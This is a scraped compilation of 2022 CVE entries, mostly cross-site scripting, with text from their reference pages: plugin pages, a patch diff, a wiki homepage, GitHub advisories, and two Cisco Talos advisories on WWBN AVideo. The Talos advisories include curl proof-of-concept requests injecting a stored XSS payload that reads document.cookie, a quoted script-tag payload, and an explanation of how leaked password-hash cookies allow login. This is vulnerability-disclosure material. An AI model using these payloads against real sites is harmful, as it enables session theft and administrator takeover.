Authenticated (subscriber+) plugin settings change leading to Stored Cross-Site Scripting (XSS) vulnerability in Akash soni's AS – Create Pinterest Pinboard Pages plugin <= 1.0 at WordPress.

 Verified

 Not fixed

**5.4**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Software

AS – Create Pinterest Pinboard Pages

Vulnerable versions

<= 1.0

PSID 

a92dbce87906

Classification 

Cross Site Scripting (XSS)

OWASP Top 10 

A7: Cross-Site Scripting (XSS)

Required privilege 

Requires subscriber or higher role user authentication.

Publicly disclosed

2022-08-10

**Details**

Authenticated plugin settings change leading to Stored Cross-Site Scripting (XSS) vulnerability discovered by ptsfence in WordPress AS – Create Pinterest Pinboard Pages plugin (versions <= 1.0).

**Solution**

No fix is available.

**References**

CVE-2022-36341: WordPress AS – Create Pinterest Pinboard Pages plugin <= 1.0 - Authenticated plugin settings change leading to Stored Cross-Site Scripting (XSS) vulnerability - Patchstack

Authenticated (editor+) Stored Cross-Site Scripting (XSS) vulnerability in Roman Pronskiy's Search Exclude plugin <= 1.2.6 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

With this plugin you can exclude any page, post or whatever from the WordPress search results by checking off the corresponding checkbox on post/page edit page.  
Supports quick and bulk edit.

On the plugin settings page you can also see the list of all the items that are hidden from search.

1.  Upload search-exclude directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  Go to any post/page edit page and check off the checkbox Exclude from Search Results if you don’t want the post/page to be shown in the search results

**Does this plugin affect SEO?**

No, it does not affect crawling and indexing by search engines.  
The ONLY thing it does is hiding selected post/pages from your site search page. Not altering SEO indexing.

If you want posts/pages to be hidden from search engines you may add the following snippet to your functions.php:

    function add_meta_for_search_excluded()
    {
        global $post;
        if (false !== array_search($post->ID, get_option('sep_exclude', array()))) {
            echo '<meta name="robots" content="noindex,nofollow" />', "\n";
        }
    }
    add_action('wp_head', 'add_meta_for_search_excluded');
    

Note: already indexed pages will remain indexed for quite a while. In order to remove them from Google index, you may use Google Search Console (or similar tool for other engines).

**Are there any hooks or actions available to customize plugin behaviour?**

Yes.  
There is an action searchexclude_hide_from_search.  
You can pass any post/page/custom\_post ids as an array in the first parameter.  
The second parameter specifies state of visibility in search. Pass true if you want to hide posts/pages,  
or false – if you want show them in the search results.

Example:  
Let’s say you want “Exclude from Search Results” checkbox to be checked off by default  
for newly created posts, but not pages. In this case you can add following code  
to your theme’s function.php:

    add_filter('default_content', 'excludeNewPostByDefault', 10, 2);
    function excludeNewPostByDefault($content, $post)
    {
        if ('post' === $post->post_type) {
            do_action('searchexclude_hide_from_search', array($post->ID), true);
        }
    }
    

Also there is a filter searchexclude_filter_search.  
With this filter you can turn on/off search filtering dynamically.  
Parameters:  
$exclude – current search filtering state (specifies whether to filter search or not)  
$query – current WP\_Query object

By returning true or false you can turn search filtering respectively.

Example:  
Let’s say you need to disable search filtering if searching by specific post\_type.  
In this case you could add following code to you functions.php:

    add_filter('searchexclude_filter_search', 'filterForProducts', 10, 2);
    function filterForProducts($exclude, $query)
    {
        return $exclude && 'product' !== $query->get('post_type');
    }
    

works well for me. I think this is one of those very useful plugins which makes something an expert can do quite easily accessible to novices for free ! Thank you

Super Brilliant Plugin. Helps a lot with SEO + prevents making a mess on the web. Hope you are doing ok. My heart goes out to all suffering in Ukraine. @-/---

I spent an hour trying to hide woocommerce products from my search, added a bunch of code to functions. This baby worked in 30 seconds. Wonderful, thanks!

Simple, light, useful and free. Amazing plugin!

Does the job very well, love the bulk option

Thanks so much for coming up with this. Working in quick edit mode makes it a super star!

Read all 68 reviews

“Search Exclude” is open source software. The following people have contributed to this plugin.

Contributors

**1.2.7**

*   This is a security release. All users are encouraged to upgrade.
*   Fix possible XSS vulnerability.

**1.2.6**

*   Fix compatibility with WordPress 5.5

**1.2.5**

*   Security release. More protection added.

**1.2.4**

*   Security release. All users are encouraged to update.
*   Added filter searchexclude\_filter\_permissions.

**1.2.2**

*   Added action searchexclude\_hide\_from\_search
*   Added filter searchexclude\_filter\_search
*   Fixed Bulk actions for Firefox

**1.2.1**

*   Fixed bug when unable to save post on PHP <5.5 because of boolval() usage

**1.2.0**

*   Added quick and bulk edit support
*   Tested up to WP 4.1

**1.1.0**

*   Tested up to WP 4.0
*   Do not show Plugin on some service pages in Admin
*   Fixed conflict with bbPress
*   Fixed deprecation warning when DEBUG is on

**1.0.6**

*   Fixed search filtering for AJAX requests

**1.0.5**

*   Not excluding items from search results on admin interface

**1.0.4**

*   Fixed links on settings page with list of excluded items
*   Tested up to WP 3.9

**1.0.3**

*   Added support for excluding attachments from search results
*   Tested up to WP 3.8

**1.0.2**

*   Fixed: Conflict with Yoast WordPress SEO plugin

**1.0.1**

*   Fixed: PHP 5.2 compatibility

**1.0**

*   Initial release

CVE-2022-36282: Search Exclude

A vulnerability classified as problematic has been found in ConsoleTVs Noxen. Affected is an unknown function of the file /Noxen-master/users.php. The manipulation of the argument create_user_username with the input "><script>alert(/xss/)</script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-207000.

main

Switch branches/tags

**1** branch **0** tags

Code

*   Clone
    
    Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

whiex Delete README.md

8a4ee36

Aug 22, 2022

Delete README.md

8a4ee36

**Git stats**

*   **3** commits

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

Noxen.docx

Add files via upload

Aug 22, 2022

**About**

No description, website, or topics provided.

**Stars**

**0** stars

**Watchers**

**1** watching

**Forks**

**0** forks

**Releases**

No releases published

**Packages**

No packages published

CVE-2022-2956: GitHub - whiex/Noxen

Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.4.

@@ -247,7 +247,10 @@ pimcore.settings.translation.domain = Class.create({

\];

  

var typesColumns \= \[

{text: t("key"), sortable: true, dataIndex: 'key', flex: 1, editable: false, filter: 'string'},

{text: t("key"), sortable: true, dataIndex: 'key', flex: 1, editable: false, filter: 'string',

editor: new Ext.form.DisplayField({

htmlEncode: true

})},

{text: t("type"), sortable: true, dataIndex: 'type', width: 100, editor: new Ext.form.ComboBox({

triggerAction: 'all',

editable: false,

@@ -315,7 +318,7 @@ pimcore.settings.translation.domain = Class.create({

icon: "/bundles/pimcoreadmin/img/flat-color-icons/delete.svg",

handler: function (grid, rowIndex) {

let data \= grid.getStore().getAt(rowIndex);

pimcore.helpers.deleteConfirm(t('translation'), data.data.key, function () {

pimcore.helpers.deleteConfirm(t('translation'), Ext.util.Format.htmlEncode(data.data.key), function () {

grid.getStore().removeAt(rowIndex);

}.bind(this));

}.bind(this)

CVE-2022-2796: [Admin] Translations - properly escape key on roweditor · pimcore/pimcore@2fd4685

Stored cross-site scripting vulnerability in PukiWiki versions 1.3.1 to 1.5.3 allows a remote attacker to inject an arbitrary script via unspecified vectors.

ようこそPukiWikiの公式サイトへ！！

最新バージョンは PukiWiki 1.5.4 です (PHP8.1対応)

*   ダウンロード: PukiWiki/Download/1.5.4

PukiWikiに関して、何か質問のある方は 質問箱 へ

**管理者の方へ†**

*   OSやPHPのバージョンアップでPukiWikiが動作しなくなった場合
    *   →FAQ/45 をご参照ください

1.  最新のリリースアナウンス、セキュリティアップデートなどの情報を受け取るためにPukiWiki-announce メーリングリストを購読して下さい
2.  PukiWiki開発サイトでは、次期バージョンの開発だけでなく、現行バージョンの1.5系の修正、セキュリティfixが行なわれています。開発日記で日々の作業の内容が掲載されていますので、PukiWikiを運用されている方は目を通すようお願いします。
3.  公表すべきではない\*1欠陥を発見された場合、可能な範囲で問題点を明確にし、既知の話題でない事を確認したうえでコミッター全員にメールにてお問い合わせ下さい。

**PukiWiki News†**

*   PukiWiki 1.5.4 リリース -- (2022-03-30)
*   PukiWiki 1.5.3 リリース -- (2020-03-30)
*   PukiWiki 1.5.2 リリース -- (2019-03-01)
*   PukiWiki 1.5.1 リリース -- (2016-03-07)
*   Team名の変更 -- (2016-03-07)
*   PukiWiki 1.5.0 リリース -- (2014-07-19)

**PukiWiki 1.5.4 リリース -- (2022-03-30)†**

PHP8.1対応の PukiWiki 最新版 PukiWiki 1.5.4 をリリースしました。

*   詳しくは: PukiWiki/Download/1.5.4
*   ダウンロード: https://ja.osdn.net/projects/pukiwiki/releases/77082

**PukiWiki 1.5.3 リリース -- (2020-03-30)†**

スマートフォン対応の PukiWiki 最新版 PukiWiki 1.5.3 をリリースしました。

*   詳しくは: PukiWiki/Download/1.5.3
*   ダウンロード: https://ja.osdn.net/projects/pukiwiki/releases/72656

**PukiWiki 1.5.2 リリース -- (2019-03-01)†**

PHP7.3対応の PukiWiki 最新版 PukiWiki 1.5.2 をリリースしました。

*   詳しくは: PukiWiki/Download/1.5.2
*   ダウンロード: https://ja.osdn.net/projects/pukiwiki/releases/69652

**PukiWiki 1.5.1 リリース -- (2016-03-07)†**

PHP7対応の PukiWiki 最新版 PukiWiki 1.5.1 をリリースしました。

*   詳しくは: PukiWiki/Download/1.5.1
*   ダウンロード: https://osdn.jp/projects/pukiwiki/releases/64807

**Team名の変更 -- (2016-03-07)†**

PukiWiki開発Team名を PukiWiki Development Team としました。旧 "PukiWiki Developer Team" からの改称になります。

*   詳しくは: Team

**PukiWiki 1.5.0 リリース -- (2014-07-19)†**

PHP5.5対応の PukiWiki 最新版 PukiWiki 1.5.0 をリリースしました。

*   詳しくは: PukiWiki/Download/1.5.0
*   ダウンロード: http://sourceforge.jp/projects/pukiwiki/files/

CVE-2022-36350: FrontPage - PukiWiki-official

Cross-site Scripting (XSS) - Stored in GitHub repository yetiforcecompany/yetiforcecrm prior to 6.4.0.

**Cross site scripting in yetiforce/yetiforce-crm**

Moderate severity GitHub Reviewed Published Aug 23, 2022 • Updated Aug 30, 2022

GHSA-w83m-rghh-frxj: Cross site scripting in yetiforce/yetiforce-crm

GHSA-jhxh-68jj-68c7: Cross site scripting in yetiforce/yetiforce-crm

Cross-site Scripting (XSS) - Reflected in GitHub repository bustle/mobiledoc-kit prior to 0.14.2.

**Cross site scripting in mobiledoc-kit**

Moderate severity GitHub Reviewed Published Aug 23, 2022 • Updated Aug 30, 2022

GHSA-hw2p-xqhq-3mjf: Cross site scripting in mobiledoc-kit

A cross-site scripting (xss) vulnerability exists in the videoAddNew functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get an authenticated user to send a crafted HTTP request to trigger this vulnerability.

**SUMMARY**

A cross-site scripting (xss) vulnerability exists in the videoAddNew functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get an authenticated user to send a crafted HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WWBN AVideo 11.6  
WWBN AVideo dev master commit 3f7c0364

**PRODUCT URLS**

AVideo - https://github.com/WWBN/AVideo

**CVSSv3 SCORE**

9.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

**CWE**

CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

**DETAILS**

AVideo is a web application, mostly written in PHP, that can be used to create an audio/video sharing website. It allows users to import videos from various sources, encode and share them in various ways. Users can sign up to the website in order to share videos, while viewers have anonymous access to the publicly-available contents. The platform provides plugins for features like live streaming, skins, YouTube uploads and more.

By making a POST request to objects/videoAddNew.json.php it’s possible to add a new video in AVideo. This request can be performed by an authenticated user with video upload permissions.

    require_once 'video.php';
    
    // [1]
    if (!empty($_POST['id'])) {
        if (!Video::canEdit($_POST['id']) && !Permissions::canModerateVideos()) {
            die('{"error":"2 ' . __("Permission denied") . '"}');
        }
    }
    
    ...
    
    $obj = new Video($_POST['title'], "", @$_POST['id']); // [2]
    
    TimeLogEnd(__FILE__, __LINE__);
    
    $obj->setClean_Title($_POST['clean_title']);
    $audioLinks = ['mp3', 'ogg'];
    $videoLinks = ['mp4', 'webm', 'm3u8'];
    TimeLogEnd(__FILE__, __LINE__);
    // [3]
    if (!empty($_POST['videoLink'])) {
        //var_dump($config->getEncoderURL()."getLinkInfo/". base64_encode($_POST['videoLink']));exit;
        $path_parts = pathinfo($_POST['videoLink']);
        $extension = strtolower(@$path_parts["extension"]);
        // [4]
        if (empty($_POST['id']) && !(in_array($extension, $audioLinks) || in_array($extension, $videoLinks))) {
            $getLinkInfo = $config->getEncoderURL() . "getLinkInfo/" . base64_encode($_POST['videoLink']);
            _error_log('videoAddNew: '.$getLinkInfo);
            $info = url_get_contents($getLinkInfo, '', 180, true);
            $infoObj = _json_decode($info);
            $paths = Video::getNewVideoFilename();
            $filename = $paths['filename'];
            $filename = $obj->setFilename($filename);
            if (is_object($infoObj)) {
                $obj->setTitle($infoObj->title);     // [5]
                $obj->setClean_title($infoObj->title);
                $obj->setDuration($infoObj->duration);
                $obj->setDescription($infoObj->description);
                file_put_contents($global['systemRootPath'] . "videos/{$filename}.jpg", base64_decode($infoObj->thumbs64));
            }
            $_POST['videoLinkType'] = "embed";
        }
        // [4]
        elseif (empty($_POST['id'])) {
            $paths = Video::getNewVideoFilename();
            $filename = $paths['filename'];
            $filename = $obj->setFilename($filename);
            $obj->setTitle($path_parts["filename"]);   // [5]
            $obj->setClean_title($path_parts["filename"]);
            $obj->setDuration("");
            $obj->setDescription(@$_POST['description']);
            $_POST['videoLinkType'] = "linkVideo";
        }
        $obj->setVideoLink($_POST['videoLink']);
    ...
    // [6]
    $resp = $obj->save(true);
    

At \[1\], the code checks if the user making the request has permission to edit the video supplied via id (unless empty).  
At \[2\], a new Video object is created, whose class is defined in video.php.  
At \[3\], the code allows the user to send a videoLink parameter, containing a link to a video that will be downloaded by AVideo and stored as the new video being added.  
At \[4\], the code takes different paths depending on whether the videoLink contains a known extension. This path doesn’t matter for the purposes of this advisory; it’s enough to note that both paths set a title \[5\] that is not controlled by the parameters sent in the current request.  
Finally, the new video object is saved into the database \[6\].

Note that if paths at \[4\] are not taken, setTitle is not called, so the title set at \[2\] is the one that will be used for the video. In order to not take the paths at \[4\], it’s enough to edit a video by calling this same page again and supplying a video id. This way the two conditions at \[4\] are not satisfied, since $_POST['id'] is not empty, allowing a user to change the video password at will.

Let’s check what happens when creating the Video object at \[2\]:

    class Video {
    ...
    public function __construct($title = "", $filename = "", $id = 0) {
        global $global;
        $this->rotation = 0;
        $this->zoom = 1;
        if (!empty($id)) {
            $this->load($id);
        }
        if (!empty($title)) {
            $this->setTitle($title); // [7]
        }
        if (!empty($filename)) {
            $this->filename = $filename;
        }
    }
    

We see we’ll end up calling setTitle \[7\]:

    public function setTitle($title) {
        if ($title === "Video automatically booked" && !empty($this->title)) {
            return false;
        }
        $new_title = strip_tags($title);
        if (strlen($new_title) > 190) {
            $new_title = substr($new_title, 0, 187) . '...';
        }
        AVideoPlugin::onVideoSetTitle($this->id, $this->title, $new_title);
        $this->title = $new_title;
    }
    

Besides string truncation and a plugin hook, there’s no explicit sanitization of the video title.

getTitle is used as interface to retrieve the video object title, which simply returns the title property:

    public function getTitle() {
        return $this->title;
    }
    

The lack of sanitization does not represent a security issue at this stage. However, there’s no sanitization in a later stage, when the videos are presented on the page. The issue is in the function getVideosListItem in objects/video.php:

        public static function getVideosListItem($videos_id, $divID = '', $style = '') {
            ...
            $objGallery = AVideoPlugin::getObjectData("Gallery");
            $program = AVideoPlugin::loadPluginIfEnabled('PlayLists');
            $template = $global['systemRootPath'] . 'view/videosListItem.html';
            $templateContent = file_get_contents($template);
            $value = Video::getVideoLight($videos_id);     // [8]
            $link = Video::getLink($value['id'], $value['clean_title'], "", $get);
            if (!empty($_GET['page']) && $_GET['page'] > 1) {
                $link = addQueryStringParameter($link, 'page', $_GET['page']);
            }
    
            $title = $value['title']; // [9]
            ...
            // [10]
            if (!empty($imgGif)) {
                $imgGifHTML = '<img src="' . getCDN() . 'view/img/loading-gif.png" data-src="' . $imgGif .
                              '" style="position: absolute; top: 0; display: none;" alt="' . $title . 
                              '" id="thumbsGIF' . $videos_id . '" class="thumbsGIF img-responsive" height="130" />';
            }
            ...
            $search = [
                ...
                '{imgGifHTML}',
                '{timeHTML}',
                '{loggedUserHTML}',
                ...
            ];
    
            $replace = [
                ...
                $imgGifHTML,
                $timeHTML,
                $loggedUserHTML,
                ...
            ];
            $btnHTML = @str_replace($search,$replace,$templateContent); // [11]
            return $btnHTML;
        }
    

At \[8\] the requested video is fetched from the database, via the function getVideoLight:

        public static function getVideoLight($id) {
            global $global, $config;
            $id = intval($id);
            $sql = "SELECT * FROM videos WHERE id = ? LIMIT 1";
            $res = sqlDAL::readSql($sql, 'i', [$id], true);
            $video = sqlDAL::fetchAssoc($res);
            sqlDAL::close($res);
            return $video;
        }
    

At \[9\] the title is extracted from the row, meaning it’s unsanitized. At \[10\] the $title is inserted direcly in an HTML string, which is eventually inserted in a bigger template \[11\] and returned.

Any view that is using getVideosListItem will trigger the stored XSS, which includes the following files:

*   view/modeYoutubeBottomRight.php
*   view/videoViewsInfo.php
*   view/videosList.php

Any other page including the pages above will clearly also trigger the XSS. The simplest way to trigger it is to visit the page for the video that contains the XSS in its title. For example, when requesting https://192.168.1.200/video/123, where 123 is the video id, AVideo internally redirects the request to https://192.168.1.200/view/index.php?v=123. Eventually, view/videosList.php is included in the page.

This issue can be used by an attacker, in the worst case, to take over an administrator account. Note that while this requires user interaction, it is very easy to trigger because the video list items are printed via several different pages.

**Exploit Proof of Concept**

First, an attacker can create a video by importing a video (https://192.168.1.200/video/48) already present in the platform.

    curl -k --cookie '84b11d010cced71edffee7aa62c4eda0=uot19510578r10nohk91j0sunb' --data-raw 'public=true&only_for_paid=false&videoLink=https://192.168.1.200/video/48' 'https://192.168.1.200/objects/videoAddNew.json.php'
    
    {
        "status": true,
        "msg": "",
        "info": "...",
        "videos_id": 135,
        "video":
        {
            "id": 135,
            "title": "sample",
            "clean_title": "sample",
            "description": "",
            ...
            "videoLink": "https://192.168.1.200/video/48",
            "next_videos_id": null,
            "isSuggested": 0,
            ...
        },
        "clearFirstPageCache": true
    }
    

A video has been created with id 135. The title is taken from the video with id 48; however, it can be changed with an XSS payload:

    curl -k --cookie '84b11d010cced71edffee7aa62c4eda0=uot19510578r10nohk91j0sunb' --data-raw 'id=133&title=%22+style=%22animation-name:bounce%22+onanimationstart=%22alert(document.cookie)%22' 'https://192.168.1.200/objects/videoAddNew.json.php'
    

Because the video list can be hidden, the Javascript might not trigger. An attacker can bypass this by using the onanimationstart event, to force the browser to execute any Javascript code on page load.

At this point the XSS has been stored, and it can be triggered by any user that visits the page https://192.168.1.200/video/135.

**VENDOR RESPONSE**

Vendor confirms issues fixed on July 7th 2022

**TIMELINE**

2022-06-29 - Initial Vendor Contact  
2022-07-05 - Vendor Disclosure  
2022-07-07 - Vendor Patch Release  
2022-08-16 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2022-28712: TALOS-2022-1540 || Cisco Talos Intelligence Group

An information disclosure vulnerability exists in the cookie functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. The session cookie and the pass cookie miss the HttpOnly flag, making them accessible via JavaScript. The session cookie also misses the secure flag, which allows the session cookie to be leaked over non-HTTPS connections. This could allow an attacker to steal the session cookie via crafted HTTP requests.This vulnerability is for the pass cookie, which contains the hashed password and can be leaked via JavaScript.

**SUMMARY**

An information disclosure vulnerability exists in the cookie functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. The session cookie and the pass cookie miss the HttpOnly flag, making them accessible via JavaScript. The session cookie also misses the secure flag, which allows the session cookie to be leaked over non-HTTPS connections. This could allow an attacker to steal the session cookie via crafted HTTP requests.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WWBN AVideo 11.6  
WWBN AVideo dev master commit 3f7c0364

**PRODUCT URLS**

AVideo - https://github.com/WWBN/AVideo

**CVSSv3 SCORE**

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-732 - Incorrect Permission Assignment for Critical Resource

**DETAILS**

AVideo is a web application, mostly written in PHP, that can be used to create an audio/video sharing website. It allows users to import videos from various sources, encode and share them in various ways. Users can sign up to the website in order to share videos, while viewers have anonymous access to the publicly-available contents. The platform provides plugins for features like live streaming, skins, YouTube uploads and more.

AVideo uses cookies to keep track of users sessions. There are two separate but similar issues that are due to missing flags during cookie creation.

**CVE-2022-32777 - Session cookie**

A session cookie is used to keep track of user sessions. The name of the session cookie is renamed depending on the installation path, as we can see in objects/include_config.php (which is included in every request):

    $global['session_name'] = md5($global['systemRootPath']);
    session_name($global['session_name']);
    

In our setup, the session name is 84b11d010cced71edffee7aa62c4eda0:

    $ echo -en /var/www/html/AVideo/|md5sum
    84b11d010cced71edffee7aa62c4eda0
    

In that same file, session_start() is called to start a session:

    if (empty($doNotStartSessionbaseIncludeConfig)) {
        $config = new Configuration();
        session_write_close();
    
        // server should keep session data for AT LEAST 1 hour
        ini_set('session.gc_maxlifetime', $config->getSession_timeout());
    
        // each client should remember their session id for EXACTLY 1 hour
        session_set_cookie_params($config->getSession_timeout());
    
        //Fix “set SameSite cookie to none” warning
        if (version_compare(PHP_VERSION, '7.3.0') >= 0) {
            setcookie('key', 'value', ['samesite' => 'None', 'secure' => true]);
        } else {
            header('Set-Cookie: cross-site-cookie=name; SameSite=None; Secure');
            setcookie('key', 'value', time() + $config->getSession_timeout(), '/; SameSite=None; Secure');
        }
    
        session_start();
    }
    

We can see that some part of the configuration is changed at runtime via ini_set. However, two important parameter configurations are missing for the session cookie: session.cookie_secure and session.cookie_httponly. This means that the cookie will get the php.ini values, which, unless set manually, has a default of 0 in PHP.

We can see the secure and HttpOnly flags are missing by doing a simple request:

    $ curl -kv https://192.168.1.200/user 2>&1 | grep 84b11d010cced71edffee7aa62c4eda0
    < Set-Cookie: 84b11d010cced71edffee7aa62c4eda0=5s2kdm4sgpte26q0sh5uac3hgd; expires=Fri, 03-Jun-2022 17:44:40 GMT; Max-Age=3600; path=/
    

This issue allows the session cookie to be leaked on non-HTTPS requests (for cookie_secure), and it also allows the cookie to be read via Javascript (for cookie_httponly), for example as a secondary step during an XSS exploitation. This cookie can then be used, in the worst case, to login to the website as administrator.

**CVE-2022-32778 - “pass” cookie**

The pass cookie is set in objects/user.php during login:

    class User {
        ...
        public function login($noPass = false, $encodedPass = false, $ignoreEmailVerification = false) {
            ...
            _setcookie("pass", $user['password'], $expires);
    

_setcookie is defined in objects/functions.php:

    function _setcookie($cookieName, $value, $expires = 0) {
        if (empty($expires)) {
            if (empty($config) || !is_object($config)) {
                $config = new Configuration();
            }
            $expires = time() + $config->getSession_timeout();
        }
    
        if (version_compare(phpversion(), '7.3', '>=')) {
            $cookie_options = [
                'expires' => $expires,
                'path' => '/',
                'domain' => getDomain(),
                'secure' => true,
                'httponly' => false,         // [1]
                'samesite' => 'None'
            ];
            return setcookie($cookieName, $value, $cookie_options);
        } else {
            return setcookie($cookieName, $value, (int) $expires, "/", getDomain());
        }
    }
    

At \[1\] we can see the code explicitly sets ‘httponly’ to false, which will allow Javascript to access the pass value.

The content of the pass cookie is a hash of the password value:

    // in objects/user.php
    public function setPassword($password, $doNotEncrypt = false) {
        if (!empty($password)) {
            if ($doNotEncrypt) {
                $this->password = ($password);
            } else {
                $this->password = encryptPassword($password);
            }
        }
    }
    
    // in objects/functions.php
    function encryptPassword($password, $noSalt = false) {
        global $advancedCustom, $global, $advancedCustomUser;
        if (!empty($advancedCustomUser->encryptPasswordsWithSalt) && !empty($global['salt']) && empty($noSalt)) {
            $password .= $global['salt']; // [2]
        }
    
        return md5(hash("whirlpool", sha1($password)));
    }
    

The salt that is used at \[2\] is fixed for the whole installation, and is set in configuration.php. This means that the lifetime of a hashed password is as long as the password itself (unless the salt is changed and all passwords get updated).

Moreover, the pass value, even if hashed, can be used to login without possessing the password itself, because of the function used to verify the password, defined in objects/functions.php:

    function encryptPasswordVerify($password, $hash, $encodedPass = false) {
        global $advancedCustom, $global;
        if (!$encodedPass || $encodedPass === 'false') {
            //_error_log("encryptPasswordVerify: encrypt");
            $passwordSalted = encryptPassword($password);
            // in case you enable the salt later
            $passwordUnSalted = encryptPassword($password, true);
        } else {
            //_error_log("encryptPasswordVerify: do not encrypt");
            $passwordSalted = $password;
            // in case you enable the salt later
            $passwordUnSalted = $password;
        }
        //_error_log("passwordSalted = $passwordSalted,  hash=$hash, passwordUnSalted=$passwordUnSalted");
        return $passwordSalted === $hash || $passwordUnSalted === $hash || $password === $hash;  // [3]
    }
    

At \[3\] we can see that a valid password is the password itself, its salted hash and also its unsalted hash. So, having this cookie set without the HttpOnly flag allows any XSS attack to retrieve a hash which is equivalent to a password, and, in the worst case, can be used to login to the website as administrator.

We can see the secure flag is missing by doing a simple request:

    $ curl -kv 'https://192.168.1.200/objects/login.json.php' \
      -X POST --data-raw 'user=user1&pass=user123&rememberme=false' 2>&1 | grep "Set-Cookie: pass"
    < Set-Cookie: pass=9e0f453febd664afe850cddb516a8415; expires=Fri, 03-Jun-2022 21:21:01 GMT; Max-Age=3600; path=/; domain=192.168.1.200; secure; SameSite=None
    

**VENDOR RESPONSE**

Vendor confirms issues fixed on July 7th 2022

**TIMELINE**

2022-06-29 - Initial Vendor Contact  
2022-07-05 - Vendor Disclosure  
2022-07-07 - Vendor Patch Release  
2022-08-16 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

Tag

#xss